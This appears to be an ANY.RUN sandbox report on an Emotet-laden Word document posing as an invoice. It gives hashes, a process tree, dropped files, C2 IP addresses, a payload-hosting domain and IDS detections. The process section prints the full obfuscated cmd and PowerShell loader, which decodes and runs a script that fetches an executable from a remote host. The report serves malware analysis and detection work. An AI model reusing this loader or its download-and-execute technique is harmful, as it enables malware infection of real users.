analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice_No_D38319.doc

Full analysis: https://app.any.run/tasks/ab921f54-9291-4fbe-9fb3-84d98eadf5b2
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 14, 2018, 13:53:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Thomas-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 17:15:00 2018, Last Saved Time/Date: Tue Nov 13 17:15:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

39DE2246383B14A66546D228166A5BF5

SHA1:

CD4D9B44AD70C6E6E1CE33380B1EF8A1C640300D

SHA256:

B0BEAA29CD7ADCDFEB4327D5DCA245CEB1BAD523880AE9FA027C4E064EDB7853

SSDEEP:

1536:ByJocn1kp59gxBK85fBt+a9ZRfYOMKBf+nE9KYFd1NoNrPJ+o2b79IpG4C+w:B341k/W48pfYOMKBf+nE9KYFd1NoNrPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2108)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2108)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2904)
    • Application was dropped or rewritten from another process

      • 614.exe (PID: 3468)
      • 614.exe (PID: 2244)
      • lpiograd.exe (PID: 2896)
      • lpiograd.exe (PID: 4000)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2076)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2076)
    • Emotet process was detected

      • lpiograd.exe (PID: 2896)
    • EMOTET was detected

      • lpiograd.exe (PID: 4000)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 4000)
    • Connects to CnC server

      • lpiograd.exe (PID: 4000)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 3492)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2076)
      • 614.exe (PID: 2244)
    • Creates files in the user directory

      • powershell.exe (PID: 2076)
    • Application launched itself

      • 614.exe (PID: 3468)
      • lpiograd.exe (PID: 2896)
    • Starts itself from another location

      • 614.exe (PID: 2244)
    • Connects to unusual port

      • lpiograd.exe (PID: 4000)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2108)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Thomas-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:13 17:15:00
ModifyDate: 2018:11:13 17:15:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 614.exe no specs 614.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2108"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_No_D38319.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3492CMD /c C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd^&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( ^&", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2904C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( &", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')"C:\windOws\sYstem32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2076poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) | & ( \"{0}{1}\" -f 'iE','X')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3468"C:\Users\admin\AppData\Local\Temp\614.exe" C:\Users\admin\AppData\Local\Temp\614.exepowershell.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
2244"C:\Users\admin\AppData\Local\Temp\614.exe"C:\Users\admin\AppData\Local\Temp\614.exe
614.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
2896"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
614.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.2.9200.
4000"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micr
Integrity Level:
MEDIUM
Version:
6.2.9200.
Total events
1 760
Read events
1 344
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA3EC.tmp.cvr
MD5:
SHA256:
2076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MJGOV9Z27BF0UI3JXECL.temp
MD5:
SHA256:
2244614.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:94294089902972AF7740A964BDBD2A39
SHA256:AFBB5D83F5C9D104A2E478A05D4350F9AD01AA82B66554F452F1336005461346
2076powershell.exeC:\Users\admin\AppData\Local\Temp\614.exeexecutable
MD5:94294089902972AF7740A964BDBD2A39
SHA256:AFBB5D83F5C9D104A2E478A05D4350F9AD01AA82B66554F452F1336005461346
2108WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:85283E8C73AC10A255BBE4286BF1BDB3
SHA256:0020F0707504300A48B9B083CDF48B2783CA33CFEDF40EFB79F861241E0A6BF5
2076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2108WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice_No_D38319.docpgc
MD5:85C47E46C17A201F75B932D3B2F46317
SHA256:A8C54ADD1FD9DF3D26F586ED5315298600784D940B8778C7849F0756D0068C78
2076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db031.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
7
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4000
lpiograd.exe
GET
50.78.167.65:7080
http://50.78.167.65:7080/
US
malicious
2076
powershell.exe
GET
200
204.152.208.130:80
http://akucakep.com/JhVWKzotm/
US
executable
448 Kb
malicious
4000
lpiograd.exe
GET
177.242.156.119:80
http://177.242.156.119/
MX
malicious
4000
lpiograd.exe
GET
200
173.11.47.169:8080
http://173.11.47.169:8080/
US
binary
132 b
malicious
2076
powershell.exe
GET
301
204.152.208.130:80
http://akucakep.com/JhVWKzotm
US
html
1.12 Kb
malicious
4000
lpiograd.exe
GET
502
12.222.134.10:7080
http://12.222.134.10:7080/
US
html
552 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4000
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious
2076
powershell.exe
204.152.208.130:80
akucakep.com
QuadraNet, Inc
US
suspicious
4000
lpiograd.exe
177.242.156.119:80
SERVICIO Y EQUIPO EN TELEFONÍA INTERNET Y TV S.A. DE C.V.
MX
malicious
4000
lpiograd.exe
189.244.86.184:990
Uninet S.A. de C.V.
MX
suspicious
4000
lpiograd.exe
173.11.47.169:8080
Comcast Cable Communications, LLC
US
malicious
4000
lpiograd.exe
12.222.134.10:7080
AT&T Services, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
akucakep.com
  • 204.152.208.130
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2076
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2076
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2076
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2076
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4000
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
4000
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
4000
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
4000
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
4 ETPRO signatures available at the full report
No debug info